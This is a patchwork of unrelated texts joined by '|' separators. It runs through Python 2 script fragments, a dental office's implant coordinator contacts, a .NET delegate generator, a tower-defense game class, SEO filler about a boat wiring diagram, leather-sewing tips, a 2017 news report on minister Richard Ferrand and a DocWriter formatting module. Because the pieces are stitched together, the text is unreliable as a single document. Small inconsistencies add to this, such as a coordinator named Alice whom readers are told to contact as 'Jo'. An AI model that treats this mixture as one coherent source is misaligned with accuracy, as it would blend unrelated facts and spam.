value.append(start_size)
else:
cardinal_idx += 1
return value
if __name__ == '__main__':
sargv = sys.argv
# TODO: maybe wanna give something in through sys.argv
begin = 6
end = 10
base = 2
if len(sargv) == 3:
begin = int(sargv[-2])
end = int(sargv[-1])
if len(sargv) == 2:
end = int(sargv[-1])
if len(sargv) == 4:
begin = int(sargv[-3])
end = int(sargv[-2])
base = int(sargv[-1])
res = produce_size_strings(begin, end, base)
if res:
print "\n".join(res)
sys.exit(0)
else:
sys.exit(1)
|
Stacy Ecklund is our Implant Coordinator for our Duluth Office.
If you have any questions or concerns regarding your treatment plan or any questions about Dental Implants, please feel free to contact Stacy directly at Duluth Office Phone Number (218) 722-8377.
Melanie Sterns is our Implant Coordinator for our Hibbing Office.
If you have any questions or concerns regarding your treatment plan or any questions about Dental Implants, please feel free to contact Mel directly at Hibbing Office Phone Number (218) 362-6222.
Alice Sand is our Implant Coordinator for our Ashland Office.
If you have any questions or concerns regarding your treatment plan or any questions about Dental Implants, please feel free to contact Jo directly at Ashland Office Phone Number (715) 682-2660.
|
# Licensed to the .NET Foundation under one or more agreements.
# The .NET Foundation licenses this file to you under the Apache 2.0 License.
# See the LICENSE file in the project root for more information.
from generate import generate
MaxTypes = 16
def gen_delegate_func(cw):
for i in range(MaxTypes + 1):
cw.write("case %(length)d: return typeof(Func<%(targs)s>).MakeGenericType(types);", length = i + 1, targs = "," * i)
def gen_delegate_action(cw):
for i in range(MaxTypes):
cw.write("case %(length)d: return typeof(Action<%(targs)s>).MakeGenericType(types);", length = i + 1, targs = "," * i)
def gen_max_delegate_arity(cw):
cw.write('private const int MaximumArity = %d;' % (MaxTypes + 1))
def main():
return generate(
("Delegate Action Types", gen_delegate_action),
("Delegate Func Types", gen_delegate_func),
("Maximum Delegate Arity", gen_max_delegate_arity),
# outer ring generators
("Delegate Microsoft Scripting Action Types", gen_delegate_action),
("Delegate Microsoft Scripting Scripting Func Types", gen_delegate_func),
)
if __name__ == "__main__":
main()
|
Background: Data Entry requires that the version match Crash Magic.
As Crash Magic is upgraded, and new features are added to the SOAP system, Data entry may become incompatible. Strict versioning is enforced to prevent unpredictable behaviors in Data Entry.
The desired CMO version must also appear in the “Allowed Versions” edit.
The desired CMO Versions must be compiled into this version of the application. This can be found in AllowedCMOVersionsU.pas file.
|
#geneaTD - A multi-touch tower defense game.
#Copyright (C) 2010-2011 Frederic Kerber, Pascal Lessel, Michael Mauderer
#
#This program is free software: you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation, either version 3 of the License, or
#(at your option) any later version.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#For more information contact the geneaTD team: info@geneatd.de
#
from libavg import *
from libavg.utils import getMediaDir
from creature import Creature
import os
import util
class Tower(object):
"""
This class represents a normal tower object.
"""
# A Map of all towers: id --> object.
towers = {}
# All creatures of player 1.
tower1 = []
# All creatures of player 2.
tower2 = []
def die(self):
"""
This method destroys the tower (unlinks the libAVG node).
"""
if self.living:
self.living = False
if self.team.id==1:
self.tower1.remove(self)
else:
self.tower2.remove(self)
del Tower.towers[id(self)]
self.towerDiv.unlink(True)
self.tower.unlink(True)
self.team.adjustScore(25)
def getDistance(self, creature):
"""
Returns the distance from the given creature to the tower.
"""
return mathutil.getDistance(self.pos, creature.getCirclePos())
def getCreaturesInExplosionRange(self):
"""
A getter for the creatures in range that should be affected.
"""
creatureList = Creature.creatures2
if self.team.id == 2:
creatureList = Creature.creatures1
return creatureList[:]
def executeTowerEffect(self, creatureList):
"""
Executes the special tower effect on the creatures that are given.
"""
for creature in creatureList:
dist = self.getDistance(creature)
if dist > self.towerCircle.r + creature.r:
continue
else:
creature.damage(2)
def executeTowerDestroyAnimation(self):
"""
The animation that happens if tower is clicked. Should call the die method afterwards.
"""
self.explosionCircle = avg.CircleNode(fillopacity=0.0, strokewidth=2, color=self.destroyCircleColor, pos=(self.towerDiv.size.x // 2, self.towerDiv.size.x // 2), parent=self.towerDiv)
anim = avg.LinearAnim(self.explosionCircle, "r", 300 , self.tower.size.x // 2, self.towerCircle.r, False, None, self.die)
anim.start()
def towerExplosion(self, event):
"""
Boom.
"""
if not self.alreadyExploded:
self.alreadyExploded = True
self.towerDiv.sensitive = False
creatureList = self.getCreaturesInExplosionRange()
self.executeTowerEffect(creatureList)
self.executeTowerDestroyAnimation()
def setAppearance(self):
"""
A setter for the appearance of the tower.
"""
self.towerDiv = avg.DivNode(size=util.towerDivSize, pos=(self.pos.x - util.towerDivSize[0] // 2, self.pos.y - util.towerDivSize[1] // 2))
#sets the explosion radius
self.towerCircle = avg.CircleNode(fillopacity=0.3, strokewidth=0, fillcolor=self.team.color, r=self.towerDiv.size.x // 2, pos = (self.towerDiv.size.x // 2, self.towerDiv.size.y // 2), parent=self.towerDiv)
self.tower = avg.RectNode(fillopacity=1, strokewidth=0, filltexhref=os.path.join(getMediaDir(__file__, "resources"), "blackball.png"), size=util.towerSize, pos=(self.pos.x - util.towerSize[0] // 2, self.pos.y - util.towerSize[1] // 2))
def __init__(self, team, pos, layer, creatureLayer):
"""
Creates a new tower instance (including libAVG nodes).
g_player: the global libAVG player.
team: the team, the tower belongs to.
pos: the position of the tower.
layer: the layer the tower should be placed on.
"""
self.living = True
self.pos = pos
self.team = team
self.layer = layer
self.setAppearance()
self.alreadyExploded =False
self.destroyCircleColor="FFA500"
tid = id(self)
self.towerDiv.id = str(tid)
Tower.towers[tid] = self
if self.team.name == "Team2":
Tower.tower2.append(self)
else:
Tower.tower1.append(self)
self.tower.subscribe(Node.CURSOR_DOWN, self.towerExplosion)
creatureLayer.appendChild(self.tower)
layer.appendChild(self.towerDiv)
|
Published at Sunday, April 21st, 2019 - 4:46 AM. 4 Wiring Diagram. By Lindsey S. Sexton.
Thank You for visiting our site. Nowadays were excited to announce that we have found an extremely interesting niche to be discussed, namely 4 gang toggle switch wiring diagram boat. Most people trying to find info about 4 gang toggle switch wiring diagram boat and definitely one of them is you, is not it?
There are many main reasons why you are searching for specifics about 4 gang toggle switch wiring diagram boat, but certainly, you are researching for different ideas for your needs. We identified this on the web sources and we believe this can be one of many wonderful material for reference. And you know, when I first found it, we loved it, hopefully you are too. We believe, we may own different opinion, but, what we do just want to help you find more references regarding 4 gang toggle switch wiring diagram boat.
Regarding Photo detailed description: Photo has been submitted by Lindsey S. Sexton. We thank you for your visit to our website. Make sure you get the information you are looking for. Do not forget to share and love our reference to help further develop our website.
|
#! /usr/bin/python
# -*- coding: utf-8 -*-
#This is a JSON parser version of our script. Sometimes you can change a feed from JSON to MRSS by changing a parameter in the URL from JSON to MRSS. But just in case...
import BC_01
import json
import requests
r = requests.get('[Insert your JSON feed URL here]')
json = json.loads(r.text)
response_array = []
#counter = 0
for index, item in enumerate(json['items']):
if index <= 2:
print item['name']
print item['id']
#print item['FLVURL']
print item['tags']
print item['shortDescription']
#print item['adKeys']
renditions = item['renditions']
max_url = None
max_bitrate = 0
#So since we're dealing with a dictionary
#we can get the nested "renditions" by saying item['renditions']
#renditions itself is a list of dictionaries, so we say for each
#dictionary (which we call rend) in the rendition list
#check if its encodingRate (ie bitrate) is larger than the
#biggest bitrate we've seen so far in the renditions list
#if it is, assign the max_url and max_bitrate variables for the
#current rendition's url and encodingRate
#note that we set max_bitrate = 0 on line 27 so that means for each
#item in the feed we find the maximum bitrate for that item's rendition list
for rend in renditions:
if rend['encodingRate'] > max_bitrate:
max_url = rend['url']
max_bitrate = rend['encodingRate']
print "MAX url", max_url, max_bitrate
#counter += 1
vid_url = max_url
item['url'] = vid_url
item['bit_rate'] = max_bitrate
response_array.append(item)
refactored = []
for entity in response_array:
new_el = entity
new_el["name"] = entity["name"]
new_el["description"] = entity["shortDescription"]
del new_el["bit_rate"]
refactored.append(new_el)
#print json.dumps(response_array, indent=4)
for idx,item in enumerate(refactored):
if idx <= 2:
name, url = item['name'], item['url']
tags = item["tags"] if "tags" in item else []
desc = item["description"] if "description" in item else ""
if not BC_01.videoNameExists(name):
print "did not see", name, "in brightcove, ingesting..."
print "working on", name, url
BC_01.createAndIngest(name, url, tags=tags, description=desc)
else:
print "already saw", name, "skipping..."
|
Leather is one of the most popular choices for clothing, and that is because it is both durable and fashionable. Animal lovers also have an alternative, as faux leather is a great replacement. While it looks amazing, sewing leather can be really difficult.
Here are some things you need to know about sewing leather before you begin and these tips should make the job easier for you.
It does not matter whether you are working with leather or faux leather, you must use a new needle in your sewing machine. Additionally, it is recommended that you choose a needle which was designed for leather.
Sewing leather is trickier than regular fabrics, and that is because you will leave a permanent hole with each stitch. This means that mistakes are not allowed. Make sure that you do your fitting before you begin sewing.
You should also avoid pins because they will damage the leather. It is recommended that you use them only within seam allowances. However, this should not worry you, as there are many alternatives such as binder clips, tape, hair clips or paper clips. If you want to buy something that was designed for sewing, you can find special clips at fabric stores.
You should choose your thread carefully as well. It is recommended that you use polyester or nylon threads because they are more durable and they won’t be affected by the leather. Most projects will require waxed thread.
Before you decide which kind of seam you should have, you must think about the look you are going for. There are many options, from plain seams and lapped seams to faux flat fell seams and single or double topstitched ones. For plain seams, you should use leather adhesive to glue the seam allowances and then use a wallpaper roller to seal them.
When you use patterns, you must remember to transfer the markings on the wrong side of the fabric. You should use tailor’s chalk and marking pens for this, and avoid marking wheels and traditional transfer paper.
Not all machines can handle leather properly. If you work with leather a lot, you should consider buying a sewing machine that can handle it. You can find some of the best options here: https://bestsewingmachines.reviews/for-leather.
If you use a piece of scotch tape over the bottom of a universal foot, you will notice that it glides easily over the leather. This way leather won’t stick to the presser foot anymore, and it will be easier for sewing leather. You can also use a Teflon foot or a roller foot.
With these tips, you should have an easier time sewing leather and doing all those leather projects you pinned on Pinterest. Unlike those handmade beaded necklaces, leather projects will last a lifetime!
Shop Grey Sweatpants, Fashion Jackets, Long Dresses, Black Gowns Dress and more. Get this widget.
|
#!/usr/bin/python
# _*_ coding: utf-8 _*_
import math
print ""
# str() 将值转化为适于人阅读的形式
# repr() 转化为供解释器读取的形式
s = 'Hello, World'
print str(s)
print repr(s)
print str(1 / 7)
x = 10 * 3.25
y = 200 * 200
s = 'The value of x is ' + repr(x) + ', and y is ' + repr(y) + '...'
print s
hello = 'hello, world\n'
hellos = repr(hello)
print hello
print hellos
print repr((x, y, ('hello', 'world')))
print str((x, y, ('hello', 'world')))
for x in range(1, 11):
print repr(x).rjust(2), repr(x * x).rjust(3),
#print repr(x * x * x).rjust(4)
print repr(x * x * x).ljust(4),
print repr(x * x * x).center(4)
for x in range(1, 11):
print '{0:2d} {1:3d} {2:4d}'.format(x, x * x, x * x * x)
x = '123456'
print x.ljust(3)[:3]
y = '-3.1415'
print x.zfill(10)
print y.zfill(10)
print 'we are the {} who say "{}!"'.format('knight', 'Ni')
print 'The story of {0}, {1}, and {other}'.format('Bill', 'Manfred', other =\
'Georg')
print 'The value of PI is approximately {0:.3f}.'.format(math.pi)
table = {'Louis': 1990, 'Shana': 2006, 'Miku': 2000}
for name, birthday in table.items():
print '{0:10} ==> {1:10d}'.format(name, birthday)
print 'Louis: {0[Louis]:d}; Shana: {0[Shana]:d}; Miku: {0[Miku]:d}'\
.format(table)
print 'Louis: {Louis:d}; Shana: {Shana:d}; Miku: {Miku:d}'.format(**table)
print 'The value of PI is approximately %5.3f.' % math.pi
|
Charly Triballeau, AFP | Richard Ferrand on visit to Deaville, Normandy, on May 29, 2017.
A French prosecutor has opened a preliminary investigation into the "past activities" of France's minister of territorial integration, Richard Ferrand, a close ally of President Emmanuel Macron.
Eric Mathais, the public prosecutor from the Breton city of Brest, said Thursday that the decision to open a probe was motivated by new media reports about Ferrand's business and financial dealings.
The issue is particularly salient given that France's newly elected president took office amid promises that politics-as-usual would be a thing of the past and his government would be squeaky clean.
But just weeks into Macron's nascent presidency, Ferrand has come under growing pressure for business practices that carry undertones of potential conflicts of interest.
Weekly newspaper Le Canard Enchaîné reported last week that an insurance company struck a rental deal with a company owned by Ferrand's partner when he led the firm.
A report published in Le Monde newspaper on Tuesday said the insurance company had contracts with both Ferrand's ex-wife and his current companion.
The newspaper also reported that Ferrand advocated for a bill advantageous to insurance companies in 2012, when he was a lawmaker.
Ferrand has denied any wrongdoing, and both Macron and his prime minister, Édouard Philippe, have expressed their support.
The controversy comes as a law to prohibit politicians from hiring family members, an issue that dogged conservative presidential candidate François Fillon, is to be formally presented to parliament next week.
A former Socialist, Ferrand was among the first to rally behind Macron, becoming his right-hand man during the campaign for the presidency.
Macron is now hoping a two-round legislative election on June 11-18 will hand him a majority in parliament and consolidate his grip on power.
|
"""
DocWriter is a tool for writing documents in ASCII, HTML,
LaTeX, DocOnce, and other formats based on input from Python
datastructures.
The base class _BaseWriter defines common functions and data
structures, while subclasses HTML, DocOnce, etc. implement (i.e.,
write to) various formats.
This module works, but is unifinished and needs documentation!
"""
from StringIO import StringIO
import re, os, glob, commands
class _BaseWriter:
"""
Base class for document writing classes.
Each subclass implements a specific format (html, latex,
rst, etc.).
"""
def __init__(self, format, filename_extension):
# use StringIO as a string "file" for writing the document:
self.file = StringIO()
self.filename_extension = filename_extension
self.format = format
self._footer_called = False
document = property(fget=lambda self: self.file.getvalue(),
doc='Formatted document as a string')
def write_to_file(self, filename):
"""
Write formatted document to a file.
Just give the stem of the file name;
the extension will be automatically added (depending on the
document format).
"""
# footer?
if not self._footer_called:
self.footer()
self._footer_called = True
f = open(filename + self.filename_extension, 'w')
f.write(self.document)
f.close()
def __str__(self):
"""Return formatted document."""
return self.document
def header(self):
"""Header as required by format. Called in constructor."""
pass
def footer(self):
"""Footer as required by format. Called in write_to_file."""
pass
def not_impl(self, method):
raise NotImplementedError, \
'method "%s" in class "%s" is not implemented' % \
(method, self.__class__.__name__)
def title(self, title, authors_and_institutions=[], date='today'):
"""
Provide title and authors.
@param title: document title (string).
@param authors_and_institutions: list of authors and their
associated institutions, where each list item is a tuple/list
with author as first element followed by the name of all
institutions this author is associated with.
@param date: None implies no date, while 'today' generates
the current date, otherwise a string is supplied.
"""
self.not_impl('title')
def today_date(self):
"""Return a string with today's date suitably formatted."""
import time
return time.strftime('%a, %d %b %Y (%H:%M)')
def section(self, title, label=None):
"""
Write a section heading with the given title and an optional
label (for navigation).
"""
self.not_impl('section')
def subsection(self, title, label=None):
"""
Write a subsection heading with the given title and an optional
label (for navigation).
"""
self.not_impl('subsection')
def subsubsection(self, title, label=None):
"""
Write a subsubsection heading with the given title and an optional
label (for navigation).
"""
self.not_impl('subsubsection')
def paragraph(self, title, ending='.', label=None):
"""
Write a paragraph heading with the given title and an ending
(period, question mark, colon) and an optional label (for navigation).
"""
self.not_impl('paragraph')
def paragraph_separator(self):
"""
Add a (space) separator between running paragraphs.
"""
self.not_impl('paragraph_separator')
def text(self, text, indent=0):
"""
Write plain text. Each line can be idented by a given number
of spaces.
"""
# do the indentation here, subclasses should call this method first
text = '\n'.join([' '*indent + line for line in text.split('\n')])
# subclasses must substitute DocOnce simple formatting
# using the expandtext method
return text
def expandtext(self, text, tags, tags_replacements):
"""
In a string text, replace all occurences of strings defined in tags
by the corresponding strings defined in tags_replacements.
Both tags and tags_replacements are dictionaries with keys such
as 'bold', 'emphasize', 'verbatim', 'math', and values consisting of
regular expression patterns.
This method allows application code to use some generic ways of
writing emphasized, boldface, and verbatim text, typically in the
DocOnce format with *emphasized text*, _boldface text_, and
`verbatim fixed font width text`.
"""
for tag in tags:
tag_pattern = tags[tag]
c = re.compile(tag_pattern, re.MULTILINE)
try:
tag_replacement = tags_replacements[tag]
except KeyError:
continue
if tag_replacement is not None:
text = c.sub(tag_replacement, text)
return text
def list(self, items, listtype='itemize'):
"""
Write list or nested lists.
@param items: list of items.
@param listtype: 'itemize', 'enumerate', or 'description'.
"""
# call _BaseWriter.unfold_list to traverse the list
# and use self.item_handler to typeset each item
self.not_impl('list')
def unfold_list(self, items, item_handler, listtype, level=0):
"""
Traverse a possibly nested list and call item_handler for
each item. To be used in subclasses for easy list handling.
@param items: list to be processed.
@param item_handler: callable, see that method for doc of arguments.
@param listtype: 'itemize', 'enumerate', or 'description'.
@param level: the level of a sublist (0 is main list, increased by 1
for each sublevel).
"""
# check for common error (a trailing comma...):
if isinstance(items, tuple) and len(items) == 1:
raise ValueError, 'list is a 1-tuple, error? If there is '\
'only one item in the list, make a real Python list '\
'object instead - current list is\n(%s,)' % items
item_handler('_begin', listtype, level)
for i, item in enumerate(items):
if isinstance(item, (list,tuple)):
self.unfold_list(item, item_handler, listtype, level+1)
elif isinstance(item, basestring):
if listtype == 'description':
# split out keyword in a description list:
parts = item.split(':')
keyword = parts[0]
item = ':'.join(parts[1:])
item_handler(item, listtype, level, keyword)
else:
item_handler(item, listtype, level)
else:
raise TypeError, 'wrong %s for item' % type(item)
item_handler('_end', listtype, level)
def item_handler(self, item, listtype, level, keyword=None):
"""
Write out the syntax for an item in a list.
@param item: text assoicated with the current list item. If item
equals '_begin' or '_end', appropriate begin/end formatting of
the list is written instead of an ordinary item.
@param listtype: 'itemize, 'enumerate', or 'description'.
@param level: list level number, 0 is the mainlist, increased by 1
for each sublist (the level number implies the amount of indentation).
@param keyword: the keyword of the item in a 'description' list.
"""
self.not_impl('item_handler')
def verbatim(self, code):
"""
Write verbatim text in fixed-width form
(typically for computer code).
"""
self.not_impl('verbatim')
def math(self, text):
"""Write block of mathematical text (equations)."""
# default: dump raw
self.raw(text)
def raw(self, text):
"""Write text directly 'as is' to output."""
self.file.write(text)
def figure_conversion(self, filename, extensions):
"""
Convert filename to an image with type according to
extension(s).
The first existing file with an extension encountered in the extensions
list is returned. If no files with the right extensions are found,
the convert utility from the ImageMagick suite is used to
convert filename.ps or filename.eps to filename + extensions[0].
"""
if not isinstance(extensions, (list,tuple)):
extensions = [extensions]
for ext in extensions:
final = filename + ext
if os.path.isfile(final):
return final
final = filename + extensions[0] # convert to first mentioned type
files = glob.glob(filename + '*')
# first convert from ps or eps to other things:
for file in files:
stem, ext = os.path.splitext(file)
if ext == '.ps' or ext == '.eps':
cmd = 'convert %s %s' % (file, final)
print cmd
failure = os.system(cmd)
if failure:
print 'Could not convert;\n %s' % cmd
return final
# try to convert from the first file to the disired format:
file = files[0]
cmd = 'convert %s %s' % (file, final)
print cmd
failure, outtext = commands.getstatusoutput(cmd)
if failure:
print 'Could not convert;\n %s' % cmd
return final
def figure(self, filename, caption, width=None, height=None, label=None):
"""
Insert a figure into the document.
filename should be without extension; a proper extension is added,
and if the figure is not available in that image format, the
convert utility from ImageMagick is called to convert the format.
"""
self.not_impl('figure')
def table(self, table, column_headline_pos='c', column_pos='c'):
"""
Translates a two-dimensional list of data, containing strings or
numbers, to a suitable "tabular" environment in the output.
@param table: list of list with rows/columns in table, including
(optional) column-headline 1st row and row-headline 1st column.
@param column_pos: specify the l/c/r position of data
entries in columns, give either (e.g.) 'llrrc' or one char
(if all are equal).
@param column_headline_pos : position l/c/r for the headline row
"""
self.not_impl('table')
def url(self, url_address, link_text=None):
"""Typeset an URL (with an optional link)."""
self.not_impl('url')
def link(self, link_text, link_target):
"""Typeset a hyperlink."""
self.not_impl('link')
# what about LaTeX references to labels in equations, pages, labels?
def makedocstr(parent_class, subclass_method):
"""
Compose a string (to be used as doc string) from a method's
doc string in a parent class and an additional doc string
in a subclass version of the method.
@param parent_class: class object for parent class.
@param subclass_method: method object for subclass.
@return: parent_class.method.__doc__ + subclass_method.__doc__
"""
parent_method = getattr(parent_class, subclass_method.__name__)
docstr = parent_method.__doc__
if subclass_method.__doc__ is not None and \
subclass_method is not parent_method:
docstr += subclass_func.__doc__
return docstr
# regular expressions for inline tags:
# (these are taken from doconce.common.INLINE_TAGS)
inline_tag_begin = r'(?P<begin>(^|[(\s]))'
inline_tag_end = r'(?P<end>($|[.,?!;:)\s]))'
INLINE_TAGS = {
# math: text inside $ signs, as in $a = b$, with space before the
# first $ and space, comma, period, colon, semicolon, or question
# mark after the enclosing $.
'math':
r'%s\$(?P<subst>[^ `][^$`]*)\$%s' % \
(inline_tag_begin, inline_tag_end),
# $latex text$|$pure text alternative$
'math2':
r'%s\$(?P<latexmath>[^ `][^$`]*)\$\|\$(?P<puretext>[^ `][^$`]*)\$%s' % \
(inline_tag_begin, inline_tag_end),
# *emphasized words*
'emphasize':
r'%s\*(?P<subst>[^ `][^*`]*)\*%s' % \
(inline_tag_begin, inline_tag_end),
# `verbatim inline text is enclosed in back quotes`
'verbatim':
r'%s`(?P<subst>[^ ][^`]*)`%s' % \
(inline_tag_begin, inline_tag_end),
# _underscore before and after signifies bold_
'bold':
r'%s_(?P<subst>[^ `][^_`]*)_%s' % \
(inline_tag_begin, inline_tag_end),
}
class DocOnce(_BaseWriter):
def __init__(self):
_BaseWriter.__init__(self, 'DocOnce', '.do.txt')
def title(self, title, authors_and_institutions=[], date='today'):
s = '\nTITLE: %s\n' % title
for ai in authors_and_institutions:
authorinfo = '; '.join(ai)
s += 'AUTHOR: %s\n' % authorinfo
if date is not None:
if date == 'today':
date = self.today_date()
s += 'DATE: %s\n' % date
self.file.write(s)
self.paragraph_separator()
def heading(self, level, title, label=None):
decoration = '='*level
self.file.write('\n%s %s %s\n\n' % (decoration, title, decoration))
def section(self, title, label=None):
self.heading(7, title, label)
def subsection(self, title, label=None):
self.heading(5, title, label)
def subsubsection(self, title, label=None):
self.heading(3, title, label)
def paragraph(self, title, ending='.', label=None):
s = '\n\n__%s%s__ ' % (title, ending)
self.file.write(s)
def paragraph_separator(self):
self.file.write('\n\n')
def text(self, text, indent=0):
text = _BaseWriter.text(self, text, indent)
# not necessary since DocOnce is the format for text:
#text = _BaseWriter.expandtext(self, text,
# INLINE_TAGS, HTML.INLINE_TAGS_SUBST)
self.file.write(text)
def list(self, items, listtype='itemize'):
self.unfold_list(items, self.item_handler, listtype)
def item_handler(self, item, listtype, level, keyword=None):
indent = ' '*level
s = ''
if item == '_begin':
if level == 1:
s += '\n'
elif item == '_end':
if level == 1:
s += '\n'
else:
# ordinary item:
if item is not None:
if listtype == 'itemize':
s += '\n%s%s* %s' % (indent, indent, item)
elif listtype == 'enumerate':
s += '\n%s%so %s' % (indent, indent, item)
elif listtype == 'description':
s += '\n%s%s- %s: %s' % (indent, indent, keyword, item)
self.file.write(s)
def verbatim(self, code):
self.file.write('\n!bc\n' + r'%s' % code + '\n!ec\n')
def figure(self, filename, caption, width=None, height=None, label=None):
filename = self.figure_conversion(filename, \
('.jpg', '.gif', '.png', '.ps', '.eps'))
s = '\nFIGURE:[%s,' % filename
if width:
s += ' width=%s ' % width
if height:
s += ' height=%s ' % width
s += '] ' + caption + '\n'
self.file.write(s)
def table(self, table, column_headline_pos='c', column_pos='c'):
# Better to factor out code in misc.csv2table!
# See how we do it with html movie...
# find max column width
mcw = 0
for row in table:
mcw = max(mcw, max([len(str(c)) for c in row]))
formatted_table = [] # table where all columns have equal width
column_format = '%%-%ds' % mcw
for row in table:
formatted_table.append([column_format % c for c in row])
width = len(' | '.join(formatted_table[0])) + 4
s = '\n\n |' + '-'*(width-2) + '|\n'
for row in formatted_table:
s += ' | ' + ' | '.join(row) + ' |\n'
s += ' |' + '-'*(width-2) + '|\n\n'
self.file.write(s)
def url(self, url_address, link_text=None):
if link_text is None:
link_text = 'link' # problems with DocOnce and empty link text
self.file.write(' %s<%s>' % (url_address, link_text))
def link(self, link_text, link_target):
self.file.write('%s (%s)' % (link_text, link_target))
# autogenerate doc strings by combining parent class doc strings
# with subclass doc strings:
for method in [title, section, subsection, subsubsection,
paragraph, text,
verbatim, # not defined here: math, raw,
figure, table, url,
list, item_handler,]:
method.__doc__ = makedocstr(_BaseWriter, method)
class HTML(_BaseWriter):
# class variables:
table_border = '2'
table_cellpadding = '5'
table_cellspacing = '2'
INLINE_TAGS_SUBST = { # from inline tags to HTML tags
# keep math as is:
'math': None, # indicates no substitution
'math2': r'\g<begin>\g<puretext>\g<end>',
'emphasize': r'\g<begin><em>\g<subst></em>\g<end>',
'bold': r'\g<begin><b>\g<subst></b>\g<end>',
'verbatim': r'\g<begin><tt>\g<subst></tt>\g<end>',
}
def __init__(self):
_BaseWriter.__init__(self, 'html', '.html')
self.header()
def header(self):
s = """\
<!-- HTML document generated by %s.%s -->
<html>
<body bgcolor="white">
""" % (__name__, self.__class__.__name__)
self.file.write(s)
def footer(self):
s = """
</body>
</html>
"""
self.file.write(s)
def title(self, title, authors_and_institutions=[], date='today'):
s = """
<title>%s</title>
<center><h1>%s</h1></center>
""" % (title, title)
for ai in authors_and_institutions:
author = ai[0]
s += """
<center>
<h4>%s</h4>""" % author
for inst in ai[1:]:
s += """
<h6>%s</h6>""" % inst
s += """\n</center>\n\n"""
if date is not None:
if date == 'today':
date = self.today_date()
s += """<center>%s</center>\n\n\n""" % date
self.file.write(s)
self.paragraph_separator()
def heading(self, level, title, label=None):
if label is None:
s = """\n<h%d>%s</h%d>\n""" % (level, title, level)
else:
s = """\n<h%d><a href="%s">%s</h%d>\n""" % \
(level, label, title, level)
self.file.write(s)
def section(self, title, label=None):
self.heading(1, title, label)
def subsection(self, title, label=None):
self.heading(3, title, label)
def subsubsection(self, title, label=None):
self.heading(4, title, label)
def paragraph(self, title, ending='.', label=None):
s = '\n\n<p><!-- paragraph with heading -->\n<b>%s%s</b>\n' \
% (title, ending)
if label is not None:
s += '<a name="%s">\n' % label
self.file.write(s)
def paragraph_separator(self):
self.file.write('\n<p>\n')
def text(self, text, indent=0):
text = _BaseWriter.text(self, text, indent)
text = _BaseWriter.expandtext(self, text,
INLINE_TAGS, HTML.INLINE_TAGS_SUBST)
self.file.write(text)
def list(self, items, listtype='itemize'):
self.unfold_list(items, self.item_handler, listtype)
def item_handler(self, item, listtype, level, keyword=None):
indent = ' '*level
s = ''
if item == '_begin':
if listtype == 'itemize':
s += '\n%s<ul>' % indent
elif listtype == 'enumerate':
s += '\n%s<ol>' % indent
elif listtype == 'description':
s += '\n%s<dl>' % indent
s += ' <!-- start of "%s" list -->\n' % listtype
elif item == '_end':
if listtype == 'itemize':
s += '%s</ul>' % indent
elif listtype == 'enumerate':
s += '%s</ol>' % indent
elif listtype == 'description':
s += '%s</dl>' % indent
s += ' <!-- end of "%s" list -->\n' % listtype
else:
# ordinary item:
if item is not None:
if listtype in ('itemize', 'enumerate'):
s += '%s%s<p><li> %s\n' % (indent, indent, item)
else:
s += '%s%s<p><dt>%s</dt><dd>%s</dd>\n' % \
(indent, indent, keyword, item)
self.file.write(s)
def verbatim(self, code):
self.file.write('\n<pre>' + r'%s' % code + '\n</pre>\n')
def figure(self, filename, caption, width=None, height=None, label=None):
filename = self.figure_conversion(filename, ('.jpg', '.gif', '.png'))
if width:
width = ' width=%s ' % width
else:
width = ''
if height:
height = ' width=%s ' % width
else:
height = ''
s = '\n<hr><img src="%s"%s%s>\n<p><em>%s</em>\n<hr><p>\n' % \
(filename, width, height, caption)
self.file.write(s)
def table(self, table, column_headline_pos='c', column_pos='c'):
s = '\n<p>\n<table border="%s" cellpadding="%s" cellspacing="%s">\n' %\
(HTML.table_border, HTML.table_cellpadding, HTML.table_cellspacing)
for line in table:
s += '<tr>'
for column in line:
s += '<td>%s</td>' % column
s += '</tr>\n'
s += '</table>\n\n'
self.file.write(s)
def url(self, url_address, link_text=None):
if link_text is None:
link_text = url_address
self.file.write('\n<a href="%s">%s</a>\n' % (url_address, link_text))
def link(self, link_text, link_target):
self.file.write('\n<a href="%s">%s</a>\n' % (link_text, link_target))
# autogenerate doc strings by combining parent class doc strings
# with subclass doc strings:
for method in [title, section, subsection, subsubsection,
paragraph, text,
verbatim, # not defined here: math, raw,
figure, table, url,
list, item_handler,]:
method.__doc__ = makedocstr(_BaseWriter, method)
class LaTeX(_BaseWriter):
def __init__(self):
raise NotImplementedError, \
'Use DocOnce class instead and filter to LaTeX'
# Efficient way of generating class DocWriter.
# A better way (for pydoc and other API references) is to
# explicitly list all methods and their arguments and then add
# the body for writer in self.writers: writer.method(arg1, arg2, ...)
class DocWriter:
"""
DocWriter can write documents in several formats at once.
"""
methods = 'title', 'section', 'subsection', 'subsubsection', \
'paragraph', 'paragraph_separator', 'text', 'list', \
'verbatim', 'math', 'raw', 'url', 'link', \
'write_to_file', 'figure', 'table',
def __init__(self, *formats):
"""
@param formats: sequence of strings specifying the desired formats.
"""
self.writers = [eval(format)() for format in formats]
def documents(self):
return [writer.document for writer in self.writers]
def __str__(self):
s = ''
for writer in self.writers:
s += '*'*60 + \
'\nDocWriter: format=%s (without footer)\n' % \
writer.__class__.__name__ + '*'*60
s += str(writer)
return s
def dispatcher(self, *args, **kwargs):
#print 'in dispatcher for', self.method_name, 'with args', args, kwargs
#self.history = (self.method_name, args, kwargs)
for writer in self.writers:
s = getattr(writer, self.method_name)(*args, **kwargs)
'''
Alternative to attaching separate global functions:
def __getattribute__(self, name):
print 'calling __getattribute__ with', name
if name in DocWriter.methods:
self.method_name = name
return self.dispatcher
else:
return object.__getattribute__(self, name)
# can use inspect module to extract doc of all methods and
# put this doc in __doc__
'''
# Autogenerate methods in class DocWriter (with right
# method signature and doc strings stolen from class _BaseWriter (!)):
import inspect
def func_to_method(func, class_, method_name=None):
setattr(class_, method_name or func.__name__, func)
for method in DocWriter.methods:
docstring = eval('_BaseWriter.%s.__doc__' % method)
# extract function signature:
a = inspect.getargspec(eval('_BaseWriter.%s' % method))
if a[3] is not None: # keyword arguments?
kwargs = ['%s=%r' % (arg, value) \
for arg, value in zip(a[0][-len(a[3]):], a[3])]
args = a[0][:-len(a[3])]
allargs = args + kwargs
else:
allargs = a[0]
#print method, allargs, '\n', a
